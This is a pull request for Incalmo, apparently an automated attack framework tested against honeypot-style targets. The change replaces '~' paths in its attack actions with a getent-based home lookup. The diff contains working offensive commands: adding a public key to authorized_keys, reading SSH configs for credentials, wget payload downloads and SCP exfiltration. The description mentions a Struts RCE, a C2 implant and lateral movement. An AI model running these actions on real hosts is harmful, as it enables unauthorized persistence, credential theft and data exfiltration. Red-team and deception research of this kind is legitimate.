### PR TITLE
Resolve $HOME via getent instead of relying on shell tilde-expansion

### DIFF
--- a/incalmo/core/actions/HighLevel/exfiltrate_data.py
+++ b/incalmo/core/actions/HighLevel/exfiltrate_data.py
@@ -2,6 +2,7 @@ import os
 from incalmo.models.agent import Agent
 
 from incalmo.core.actions.high_level_action import HighLevelAction
+from incalmo.core.actions.low_level_action import RESOLVE_HOME
 from incalmo.core.actions.LowLevel import (
     MD5SumAttackerData,
     ReadFile,
@@ -101,7 +102,7 @@ class ExfiltrateData(HighLevelAction):
     ) -> str | None:
         # Discover whatever .pub key exists rather than guessing the type
         list_events = await low_level_action_orchestrator.run_action(
-            ListFilesInDirectory(agent, "~/.ssh"), context
+            ListFilesInDirectory(agent, f"{RESOLVE_HOME}/.ssh"), context
         )
         pub_files = []
         for event in list_events:
@@ -111,7 +112,7 @@ class ExfiltrateData(HighLevelAction):
 
         for filename in pub_files:
             events = await low_level_action_orchestrator.run_action(
-                ReadFile(agent, f"~/.ssh/{filename}"), context
+                ReadFile(agent, f"{RESOLVE_HOME}/.ssh/{filename}"), context
             )
             for event in events:
                 if (
@@ -157,7 +158,7 @@ class ExfiltrateData(HighLevelAction):
                 ssh_port = str(ssh_port)
 
                 ssh_user = target_agent.username
-                filename = "~/" + os.path.basename(critical_filepath)
+                filename = f"{RESOLVE_HOME}/" + os.path.basename(critical_filepath)
 
                 await low_level_action_orchestrator.run_action(
                     SCPFile(

--- a/incalmo/core/actions/HighLevel/find_information_on_host.py
+++ b/incalmo/core/actions/HighLevel/find_information_on_host.py
@@ -1,4 +1,5 @@
 from ..high_level_action import HighLevelAction
+from ..low_level_action import RESOLVE_HOME
 from ..LowLevel.list_files_in_directory import ListFilesInDirectory
 from ..LowLevel.find_ssh_config import FindSSHConfig
 
@@ -49,7 +50,7 @@ class FindInformationOnAHost(HighLevelAction):
             events += new_events
 
             # First try to find all user directories
-            user_home_dir = f"~/"
+            user_home_dir = f"{RESOLVE_HOME}/"
             new_events = await low_level_action_orchestrator.run_action(
                 ListFilesInDirectory(agent, user_home_dir), context
             )

--- a/incalmo/core/actions/LowLevel/add_ssh_key.py
+++ b/incalmo/core/actions/LowLevel/add_ssh_key.py
@@ -1,4 +1,4 @@
-from ..low_level_action import LowLevelAction
+from ..low_level_action import LowLevelAction, RESOLVE_HOME
 
 from incalmo.models.agent import Agent
 
@@ -7,6 +7,9 @@ class AddSSHKey(LowLevelAction):
     def __init__(self, agent: Agent, public_ssh_key: str):
         self.public_ssh_key = public_ssh_key
 
-        command = f"echo '{public_ssh_key}' >> ~/.ssh/authorized_keys; sed -i 's/\\\\//g' ~/.ssh/authorized_keys"
+        command = (
+            f"echo '{public_ssh_key}' >> {RESOLVE_HOME}/.ssh/authorized_keys; "
+            f"sed -i 's/\\\\//g' {RESOLVE_HOME}/.ssh/authorized_keys"
+        )
 
         super().__init__(agent, command)

--- a/incalmo/core/actions/LowLevel/find_ssh_config.py
+++ b/incalmo/core/actions/LowLevel/find_ssh_config.py
@@ -1,4 +1,4 @@
-from ..low_level_action import LowLevelAction
+from ..low_level_action import LowLevelAction, RESOLVE_HOME
 from incalmo.models.agent import Agent
 
 from incalmo.core.models.events import SSHCredentialFound
@@ -24,7 +24,7 @@ def parse_ssh_config(config):
 
 class FindSSHConfig(LowLevelAction):
     def __init__(self, agent: Agent):
-        command = "cat ~/.ssh/config"
+        command = f"cat {RESOLVE_HOME}/.ssh/config"
         super().__init__(agent, command)
 
     async def get_result(

--- a/incalmo/core/actions/LowLevel/md5sum_attacker_data.py
+++ b/incalmo/core/actions/LowLevel/md5sum_attacker_data.py
@@ -1,4 +1,4 @@
-from ..low_level_action import LowLevelAction
+from ..low_level_action import LowLevelAction, RESOLVE_HOME
 from incalmo.models.agent import Agent
 from incalmo.core.models.events import Event, ExfiltratedData
 from incalmo.models.command_result import CommandResult
@@ -9,7 +9,7 @@ class MD5SumAttackerData(LowLevelAction):
     ability_name = "deception-exfil-results"
 
     def __init__(self, agent: Agent):
-        command = "find ~/ -maxdepth 1 -type f -exec md5sum {} +"
+        command = f"find {RESOLVE_HOME}/ -maxdepth 1 -type f -exec md5sum {{}} +"
         super().__init__(agent, command)
 
     async def get_result(

--- a/incalmo/core/actions/LowLevel/wgetFile.py
+++ b/incalmo/core/actions/LowLevel/wgetFile.py
@@ -1,4 +1,4 @@
-from ..low_level_action import LowLevelAction
+from ..low_level_action import LowLevelAction, RESOLVE_HOME
 
 from incalmo.models.agent import Agent
 
@@ -7,5 +7,5 @@ class wgetFile(LowLevelAction):
     def __init__(self, agent: Agent, url: str):
         self.url = url
 
-        command = f"wget -P ~/ {url}"
+        command = f"wget -P {RESOLVE_HOME}/ {url}"
         super().__init__(agent, command)

--- a/incalmo/core/actions/LowLevelOptimal/add_ssh_key.py
+++ b/incalmo/core/actions/LowLevelOptimal/add_ssh_key.py
@@ -1,4 +1,4 @@
-from ..low_level_action import LowLevelAction
+from ..low_level_action import LowLevelAction, RESOLVE_HOME
 
 from incalmo.models.agent import Agent
 
@@ -7,6 +7,9 @@ class AddSSHKey(LowLevelAction):
     def __init__(self, agent: Agent, public_ssh_key: str):
         self.public_ssh_key = public_ssh_key
 
-        command = f"echo '{public_ssh_key}' >> ~/.ssh/authorized_keys; sed -i 's/\\\\//g' ~/.ssh/authorized_keys"
+        command = (
+            f"echo '{public_ssh_key}' >> {RESOLVE_HOME}/.ssh/authorized_keys; "
+            f"sed -i 's/\\\\//g' {RESOLVE_HOME}/.ssh/authorized_keys"
+        )
 
         super().__init__(agent, command)

--- a/incalmo/core/actions/LowLevelOptimal/wgetFile.py
+++ b/incalmo/core/actions/LowLevelOptimal/wgetFile.py
@@ -1,4 +1,4 @@
-from ..low_level_action import LowLevelAction
+from ..low_level_action import LowLevelAction, RESOLVE_HOME
 
 from incalmo.models.agent import Agent
 
@@ -7,5 +7,5 @@ class wgetFile(LowLevelAction):
     def __init__(self, agent: Agent, url: str):
         self.url = url
 
-        command = f"wget -P ~/ {url}"
+        command = f"wget -P {RESOLVE_HOME}/ {url}"
         super().__init__(agent, command)

--- a/incalmo/core/actions/low_level_action.py
+++ b/incalmo/core/actions/low_level_action.py
@@ -6,6 +6,23 @@ if TYPE_CHECKING:
     from incalmo.models.command_result import CommandResult
     from incalmo.models.agent import Agent
 
+# A dispatched agent's commands run through the C2 implant's shell executor, not
+# a fresh login shell - and on Debian/Ubuntu targets that executor is `sh`
+# (dash), not bash. Bash falls back to the password database for `~` when $HOME
+# isn't set in its environment; dash does not, and silently leaves `~` literal
+# instead - `cat ~/.ssh/config` then tries to open a file named `~` and finds
+# nothing. Confirmed live: an implant-dispatched FindSSHConfig read a config
+# file that genuinely existed as empty on every attempt, while the identical
+# read succeeded through a fresh (bash-launched) exploit shell on the same
+# host - the difference was exactly this, not permissions or the credential.
+# Use RESOLVE_HOME in place of a literal `~` in any command string built here:
+# it re-derives the home directory via NSS (getent), which depends on nothing
+# but the real UID and so works the same under any shell, with or without
+# $HOME set. (Only for paths the command's OWN host resolves locally - an scp
+# destination like `host:~/x` is resolved by the REMOTE sshd's login session,
+# a different mechanism this doesn't apply to.)
+RESOLVE_HOME = "$(getent passwd $(whoami) | cut -d: -f6)"
+
 
 class LowLevelAction(ABC):
     def __init__(

--- a/incalmo/core/strategies/state_machine/optimal_replay.py
+++ b/incalmo/core/strategies/state_machine/optimal_replay.py
@@ -6,6 +6,7 @@ StateMachineStrategy named "OptimalReplayStrategy" with a script_path."""
 
 import json
 
+from incalmo.core.actions.low_level_action import RESOLVE_HOME
 from incalmo.core.strategies.incalmo_strategy import IncalmoStrategy
 from incalmo.core.actions.LowLevelOptimal import (
     ExploitStruts,
@@ -70,7 +71,7 @@ class OptimalReplayStrategy(IncalmoStrategy):
             if src_agent is None:
                 return False
             events = await self.low_level_action_orchestrator.run_action(
-                ReadFile(src_agent, "~/.ssh/id_ed25519.pub")
+                ReadFile(src_agent, f"{RESOLVE_HOME}/.ssh/id_ed25519.pub")
             )
             key = next(
                 (e.contents for e in events if isinstance(e, FileContentsFound)), None


### PR DESCRIPTION
## What

Fixes a silent, 100%-reproducible failure: several actions never actually read/wrote `~`-relative paths correctly when dispatched through the C2 implant, because the implant's shell executor is `sh` (dash on Debian/Ubuntu) — and dash does not fall back to the password database for `~` when `$HOME` isn't set in its own process environment, unlike bash. It leaves `~` unexpanded instead, so e.g. `cat ~/.ssh/config` tries to open a file literally named `~` and finds nothing — indistinguishable from "the file doesn't exist."

## How this was found

Investigating why a Kimi/incalmo attacker never used an on-path honey SSH credential despite reasoning about it correctly and landing on the exact host it was planted on: `FindSSHConfig` returned empty 12/12 times. A live repro (real S2-048/Struts RCE against the same base image, credential planted the identical way the defender does) proved:
- the credential existed, correctly, at `~/.ssh/config` under `tomcat`
- reading it through a **fresh bash-launched RCE shell** worked immediately
- `/bin/sh` on the image is `dash`, and `dash` with `$HOME` unset returns `Permission denied` on the identical `cat ~/.ssh/config` — while the same command with `$HOME` explicitly set works

This is exactly the layer Incalmo's dispatched (implant-run) commands go through, and none of Incalmo's own code sets an executor preference, so the platform default (`sh`/dash) applies.

## Changes

**`LowLevelAction.RESOLVE_HOME`** (new shared constant): `$(getent passwd $(whoami) | cut -d: -f6)` — re-derives the home directory via NSS off the real UID, independent of any environment variable, so it's correct under bash or dash regardless of what `$HOME` carries. Verified directly against a real dash shell with `$HOME` unset (`env -i`).

Applied everywhere a command embeds `~` for a path on **the command's own host** (a broader sweep beyond the original finding):
- `LowLevel/`: `FindSSHConfig`, `MD5SumAttackerData`, `wgetFile`, `AddSSHKey`
- `LowLevelOptimal/`: `wgetFile`, `AddSSHKey` (duplicate implementations used by `OptimalReplayStrategy`)
- `HighLevel/find_information_on_host.py`: the `~/` passed to `ListFilesInDirectory` when listing a host's home directory
- `HighLevel/exfiltrate_data.py`: reading the attacker's own `~/.ssh` (public-key discovery) and the `~/<file>` SCP destination in `direct_ssh_exfiltrate`
- `state_machine/optimal_replay.py`: reading `~/.ssh/id_ed25519.pub`

**Left untouched** (different mechanism, doesn't apply): both `ssh_lateral_move.py`'s (`LowLevel` and `LowLevelOptimal`) — their `~` is inside an `scp` *destination* path (`hostname:~/sandcat_tmp.go`), resolved by the **remote** sshd's own login session on a different host, not by this host's dash executor.

## Reviewer notes

- Branched off `main`, independent of the still-open `fix/lateral-move-msf-dispatch` PR — no overlapping files.
- No live end-to-end re-test of the *full* Incalmo dispatch path yet (would need the real C2 stack + a live sandcat implant); the fix targets a mechanism proven directly (dash's actual tilde-expansion behavior with/without `$HOME`). A live confirmation via a provisioned experiment is in progress.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
